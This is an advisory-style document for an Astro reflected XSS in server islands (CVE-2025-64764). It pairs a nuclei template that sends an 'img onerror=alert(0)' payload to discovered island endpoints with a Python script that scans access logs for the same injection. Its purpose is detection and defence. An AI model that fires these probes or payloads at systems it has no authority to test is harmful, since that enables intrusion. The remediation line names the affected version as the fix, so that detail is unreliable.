Vulnerability description
Astro 5.15.8 contains a reflected XSS caused by improper handling of the server islands feature, letting remote attackers execute scripts in a victim's browser; exploitation requires that the application uses server islands.
id: CVE-2025-64764

info:
  name: Astro - Reflected XSS via server islands feature
  author: DhiyaneshDk,zhero___
  severity: high
  description: |
    Astro 5.15.8 contains a reflected XSS caused by improper handling of the server islands feature, letting remote attackers execute scripts in a victim's browser; exploitation requires that the application uses server islands.
  impact: |
    Remote attackers can execute scripts in users' browsers, potentially leading to session hijacking or data theft.
  remediation: |
    Update to version 5.15.8 or later.
  reference:
    - https://zhero-web-sec.github.io/research-and-things/unlocking-reflected-xss-in-the-astro-framework
  metadata:
    verified: true
    max-request: 2
    shodan-query: html:"_server-islands"
  tags: cve,cve2025,astro,xss,vkev

variables:
  rand: "{{to_lower(rand_text_alpha(5))}}"

http:
  # Request 1: fetch the home page and discover a server-island endpoint in the rendered HTML.
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    max-redirects: 2
    matchers:
      - type: regex
        part: body
        regex:
          - '/_server-islands/[^?]+\?e='
        internal: true

    extractors:
      - type: regex
        name: value
        part: body
        internal: true
        group: 1
        regex:
          - '/_server-islands/([^?]+)\?e='

  # Request 2: call the discovered island with a marker prop and check that it is reflected unencoded.
  - raw:
      - |
        GET /_server-islands/{{value}}?e=file&p=&s={"{{rand}}":"<img+src=x+onerror=alert(0)>"} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "<img src=x onerror=alert(0)>")'
        condition: and
# digest: 490a00463044022059e860f37367a2573255fd4a7bcd160982043b00bf607300b96da0a4d58a4d48022027db021aa711df2ba26686238d8d99c39e17b47d10e8666333c42fd58de6f5d2:922c64590222798bb761d5b6d8e72950
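The template above probes a site from the outside; the defender-side counterpart is to look for the same request shape in web server access logs. The script below is an added example, not part of the nuclei template or of the Astro project: it parses combined-format access log lines (an assumption about the log format), keeps only requests to the `/_server-islands/` path that the template discovers, URL-decodes the query parameters and flags any whose decoded value contains markup-like content (an opening tag, an `on*=` handler, or a `javascript:` URL). The sample log lines are constructed; the third one carries the URL-encoded form of the template's own marker payload, the other two are benign traffic.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format). Line 3 carries the
# URL-encoded form of the template's marker payload; lines 1 and 2 are benign.
SAMPLE_LOG = (
    '203.0.113.5 - - [12/Jan/2026:10:00:01 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0"\n'
    '203.0.113.5 - - [12/Jan/2026:10:00:02 +0000] "GET /_server-islands/Avatar?e=default&p=abc'
    '&s=%7B%22name%22%3A%22Ada%22%7D HTTP/1.1" 200 340 "-" "Mozilla/5.0"\n'
    '198.51.100.7 - - [12/Jan/2026:10:00:03 +0000] "GET /_server-islands/Avatar?e=file&p='
    '&s=%7B%22abcde%22%3A%22%3Cimg+src%3Dx+onerror%3Dalert(0)%3E%22%7D HTTP/1.1" 200 410 "-" "curl/8.0"\n'
)

# Combined log format: ip ident user [timestamp] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Markup-like content inside a decoded parameter value: an opening/closing tag,
# an inline on*= event handler, or a javascript: URL.
MARKUP_RE = re.compile(r'<\s*/?[a-z!]|\bon[a-z]+\s*=|javascript:', re.IGNORECASE)

# Path prefix of the server-island endpoints that the template discovers.
ISLAND_PREFIX = "/_server-islands/"


def parse_access_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def is_server_island_request(target):
    """True if the request target's path is a server-island endpoint."""
    return urlsplit(target).path.startswith(ISLAND_PREFIX)


def suspicious_params(target):
    """Decode the query string and return (name, value) pairs whose value looks like markup."""
    hits = []
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    for name, values in query.items():
        for value in values:          # parse_qs already percent-decodes and turns '+' into space
            if MARKUP_RE.search(value):
                hits.append((name, value))
    return hits


def scan_log(text):
    """Scan log text; return one finding per server-island request carrying markup-like parameters."""
    findings = []
    for line in text.splitlines():
        rec = parse_access_line(line)
        if rec is None or not is_server_island_request(rec["target"]):
            continue
        hits = suspicious_params(rec["target"])
        if hits:
            findings.append({
                "ip": rec["ip"],
                "timestamp": rec["ts"],
                "path": urlsplit(rec["target"]).path,
                "status": rec["status"],     # 200 means the island rendered; compare with blocked/4xx
                "params": hits,
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['timestamp']} {f['path']} status={f['status']} params={f['params']}")
```

The check keys on the decoded parameter content rather than on the literal `alert(0)` string, so it also catches the same injection delivered with a different marker; the status code is kept in each finding so that a 200 (island rendered the props) can be distinguished from requests a WAF or the upgraded framework rejected.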